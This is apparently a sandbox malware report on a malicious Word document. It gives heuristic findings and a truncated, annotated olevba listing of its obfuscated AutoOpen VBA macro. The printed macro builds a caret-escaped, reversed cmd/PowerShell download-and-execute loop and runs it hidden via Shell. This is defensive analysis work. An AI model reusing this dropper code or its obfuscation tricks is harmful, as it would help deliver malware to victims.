MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro passes a command line, assembled by concatenating the return values of several helper functions, to the Shell function. The first visible fragment is the caret-obfuscated string 'md /V^:^ON/C' (the leading 'c' of 'cmd' is presumably supplied by the KeyString() call, which is not in the preview); '/V:ON' enables delayed expansion and '/C' runs the quoted command. When the cmd.exe '^' escape characters are stripped and the fragments reversed, they read as PowerShell — e.g. "foreach($UXD in $Krm){try{$IbR.DownloadFile($UXD, $zuh);Invoke-Item $zuh;break;}catch{}}" — a download-and-execute loop over a list of URLs, which is the common downloader pattern for staging further malicious payloads. The specific family could not be determined from the macro alone; the ClamAV signature name (Doc.Malware.Valyria) is the only family-level indicator in this report.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6702565-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Valyria-6702565-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
AutoOpen macro — high — OLE_VBA_AUTOOPEN: AutoOpen macro (auto-executes when the document is opened; the extracted source below confirms it is the entry point that calls Shell)
-
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: the "no modern VBA project was recovered" wording conflicts with the OLE_VBA_MACROS / OLE_VBA_AUTOOPEN findings above and with the macros.bas artifact extracted by olevba; treat this heuristic as redundant with those findings rather than as independent evidence.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard OOXML DrawingML XML namespace identifier, not a network indicator; the actual download URLs (the $Krm list referenced by the decoded PowerShell) are built from string fragments inside the macro and are not present as plain URLs in the document body.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11260 bytes |
| SHA-256: 65d9270661188bc46447c4d3b9e92ec6aa885ed56c642761cf333f220462e8f8 | | | |
Preview script — first 1,000 lines of the extracted script (shown verbatim as decoded by olevba; the listing is truncated, so helper functions referenced by AutoOpen may lie outside it)
Attribute VB_Name = "IsOiMOL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word runs AutoOpen when the document is opened
' (the OLE_VBA_AUTOOPEN heuristic above). The only live statement in this body is
' the MNFVUfw(...) call; every Dim/assignment around it is filler whose result is
' never read again in this block.
Sub AutoOpen()
' Filler: Mid/MidB/Left called with start/length arguments far beyond the literal's
' length, so each yields "" or the untouched literal. Dead stores meant to pad and
' obfuscate, not logic.
Dim OBaRwz(1)
OBaRwz(0) = MidB("mhKtvu", 166, 59)
Dim jjpGVY(2)
jjpGVY(0) = Left("jYfKrL", 765)
jjpGVY(1) = Mid("zjczwOI", 686, 745)
' Builds the command line by concatenating the return values of several
' parameterless functions (VBA invokes them by bare name) and hands the result to
' MNFVUfw, which passes it to Shell.
' 9 + 9 + 12 + 1 + 36 = 67, i.e. ASCII "C". KeyString is defined outside this
' excerpt; if it is a Chr-style lookup (TODO confirm) the result is "C", which
' completes "cmd" with the "md " literal that kITWPHLPiG begins with.
' Only kITWPHLPiG and the start of QLpJzui are visible in this preview; luGrwhMwj,
' OwitUG, bASKCSftizIf and PYnbqwFRwcaDX are not.
MNFVUfw (KeyString(9 + 9 + 12 + 1 + 36) + kITWPHLPiG + QLpJzui + luGrwhMwj + OwitUG + bASKCSftizIf + PYnbqwFRwcaDX)
' More filler (unused dead stores, same pattern as above).
Dim EwkwLQ(2)
EwkwLQ(0) = Mid("iJEqjwuN", 374, 593)
EwkwLQ(1) = Left("ICMtjRRT", 346)
Dim lKdSa(2)
lKdSa(0) = MidB("BPukLP", 365, 589)
lKdSa(1) = MidB("waTqFlGr", 524, 874)
Dim SwEdG(1)
SwEdG(0) = MidB("TpDrkj", 217, 796)
Dim zCAcpw(1)
zCAcpw(0) = MidB("GVIYjuz", 966, 460)
End Sub
' Execution primitive: runs the string ZICNjmC as a new process via Shell.
' ZICNjmC is the concatenated command line assembled in AutoOpen. Everything else
' in the body is filler (dead stores, same pattern as AutoOpen). The function never
' assigns its own return value, so Shell's task ID is discarded.
Function MNFVUfw(ZICNjmC As String)
' Filler (unused).
Dim CGmLJ(2)
CGmLJ(0) = Mid("kWzql", 507, 762)
CGmLJ(1) = Mid("BzHnB", 916, 97)
Dim ifSCZ(2)
ifSCZ(0) = Right("svrbiGIR", 977)
ifSCZ(1) = MidB("JbisIwW", 402, 363)
Dim YTBEH(2)
YTBEH(0) = MidB("fJozk", 965, 941)
YTBEH(1) = MidB("jWIEWYzl", 159, 850)
' The only live statement. The trailing "@" is a VBA type-declaration (Currency)
' suffix; it looks like a signature-evasion quirk rather than a functional change —
' confirm in a sandbox. The window-style argument is CInt(msoBarTypeNormal), an
' Office MsoBarType enum constant; it presumably coerces to 0 (= vbHide), meaning
' the spawned console window would be hidden — verify.
Shell@ ZICNjmC, CInt(msoBarTypeNormal)
' Filler (unused).
Dim CdpJdz(2)
CdpJdz(0) = Mid("XoqsCqwP", 246, 835)
CdpJdz(1) = Mid("NzYKaYEj", 280, 375)
Dim hJGNiI(2)
hJGNiI(0) = Mid("jkppoFQZ", 33, 453)
hJGNiI(1) = MidB("wrXAvmHz", 289, 640)
End Function
Attribute VB_Name = "tQSqmMzvmaCA"
' Returns the first chunk of the command line: the cmd.exe prefix followed by the
' start of a variable assignment whose value is a PowerShell script written
' backwards. Each literal is sprinkled with "^" — cmd.exe's escape character, which
' cmd strips while parsing — so the strings below are read here with "^" removed.
' The decoded readings are derived only from the literals in this function; the
' cmd-side loop that un-reverses the variable and the definitions of $Krm and $IbR
' are not in this excerpt.
' Interleaved Dim/assignment lines are filler (unused dead stores, as in AutoOpen).
Function kITWPHLPiG()
Dim bSRIz(2)
bSRIz(0) = MidB("lGduDr", 363, 970)
bSRIz(1) = MidB("mQDLi", 310, 269)
Dim NAqIu(2)
NAqIu(0) = Right("fNXzLu", 203)
NAqIu(1) = Right("ANJfi", 841)
Dim oLsjT(1)
oLsjT(0) = Right("wwABMvz", 257)
' cmd.exe prefix. ChrW(3+3+0+1+27) = ChrW(34) = double quote. With "^" stripped:
'   md /V:ON/C"set OpB= ...
' /V:ON enables delayed variable expansion, /C runs the quoted command. The leading
' "c" of "cmd" is not produced here (see the KeyString call in AutoOpen).
GLAVjkQiVVX = "md " + "/V" + "^" + ":^" + "O" + "N/C" + ChrW(3 + 3 + 0 + 1 + 27) + "s^" + "e^t" + " ^Op" + "^B" + "= " + "^ ^" + " ^ "
Dim ZwJiP(2)
ZwJiP(0) = MidB("mvnEM", 508, 574)
ZwJiP(1) = Left("UZlDY", 667)
' Start of OpB's value: padding spaces followed by "}". From here on the fragments
' are reversed PowerShell; this "}" is the last character of the script.
YGqBqHG = "^ ^" + " ^ ^" + " " + " ^" + " ^" + " " + "^ }^"
Dim IAHKN(1)
IAHKN(0) = MidB("AKibChOf", 638, 477)
Dim JIkQlI(1)
JIkQlI(0) = Mid("qwBljzz", 250, 791)
Dim AZitB(1)
AZitB(0) = Right("FNNYsaVc", 473)
Dim RwfupM(1)
RwfupM(0) = Left("trEiKjK", 237)
' "^" stripped: }{hctac};kaerb  -> reversed: break;}catch{}
ORjAbKt = "}{^" + "h" + "c" + "tac" + "^" + "};k^" + "aer" + "b" + "^"
Dim TfnwDq(1)
TfnwDq(0) = Left("AJsHR", 418)
Dim Etowus(1)
Etowus(0) = Left("bZGnRn", 115)
' "^" stripped: ;huz$ metI-ekovnI;)  -> reversed: );Invoke-Item $zuh;
' Invoke-Item on $zuh launches the downloaded file.
YAbMtmZCm = ";^h" + "^uz^" + "$ m" + "^" + "etI-" + "^" + "e" + "^" + "kovn" + "I;" + ")^"
Dim wLUmUB(2)
wLUmUB(0) = Left("UCrqR", 526)
wLUmUB(1) = Left("hoWbo", 690)
Dim lDENs(2)
lDENs(0) = MidB("ZXuHRc", 400, 194)
lDENs(1) = MidB("Gjrlis", 11, 510)
' "^" stripped: huz$ ,DXU$(eliFdaolnwoD.Rb  -> reversed: bR.DownloadFile($UXD, $zuh
' i.e. $IbR.DownloadFile($UXD, $zuh): fetch URL $UXD to local path $zuh.
FqrcPLJBmhl = "hu^z" + "^$^ " + "^" + ",D" + "X^" + "U$(" + "^eli" + "Fd^a" + "^o" + "ln" + "wo^D" + "^.R" + "b"
Dim jLBmR(2)
jLBmR(0) = Right("VzponrOd", 949)
jLBmR(1) = MidB("jqYhvn", 178, 841)
Dim GcRiOq(2)
GcRiOq(0) = MidB("baRiG", 189, 756)
GcRiOq(1) = Mid("fwjzzoXQ", 306, 847)
Dim pdkcuP(2)
pdkcuP(0) = Mid("KzGQsbRt", 685, 140)
pdkcuP(1) = MidB("chzkMD", 835, 184)
' "^" stripped: I${yrt{)mrK$ ni DX  -> reversed: XD in $Krm){try{$I
EQGLbkA = "^" + "I${^" + "yr^" + "t" + "{)m" + "r" + "K^" + "$^ n" + "i " + "D^X"
Dim FQjll(2)
FQjll(0) = Right("oalEib", 691)
FQjll(1) = MidB("vuSklTUm", 745, 456)
' "^" stripped: U$(hcaerof;'e  -> reversed: e';foreach($U
idIEhDmb = "U^" + "$(" + "^hc" + "^a" + "e" + "r^o" + "^f^;" + "^" + "'^e"
' Join in source order. Because the script portion is reversed, reading the
' fragments last-to-first gives the forward PowerShell:
'   e';foreach($UXD in $Krm){try{$IbR.DownloadFile($UXD, $zuh);Invoke-Item $zuh;break;}catch{}}
' a download-and-execute loop that stops at the first URL that succeeds.
kITWPHLPiG = GLAVjkQiVVX + YGqBqHG + ORjAbKt + YAbMtmZCm + FqrcPLJBmhl + EQGLbkA + idIEhDmb
' Filler (unused).
Dim CLCtF(2)
CLCtF(0) = Mid("zCzTC", 563, 950)
CLCtF(1) = MidB("dZuouG", 717, 151)
Dim jAwci(2)
jAwci(0) = Left("vHZtfOl", 290)
jAwci(1) = Left("KtRaRVm", 933)
Dim LvCJW(1)
LvCJW(0) = Right("qQhID", 44)
Dim CMUBO(1)
CMUBO(0) = Right("lztqGdwj", 360)
End Function
Function QLpJzui()
Dim DOsMn(2)
DOsMn(0) = Left("DSQcWsOU", 687)
DOsMn(1) = MidB("Lmvjjvt", 945, 851)
Dim BZauki(2)
BZauki(0) = Right("CuFqMW", 974)
BZauki(1) = Left("hvGjj", 390)
OwFbiJwbWP = "^" + "xe.'" + "^" + "+i^w" + "^" + "l^$^" + "+^"
Dim BZElm(1)
BZElm(0) = MidB("aKWAWwSr", 283, 387)
Dim VjsmH(1)
VjsmH(0) = MidB("uTLzBs", 797, 636)
Dim oSocV(1)
oSocV(0) = Mid(
... (truncated)
|
|||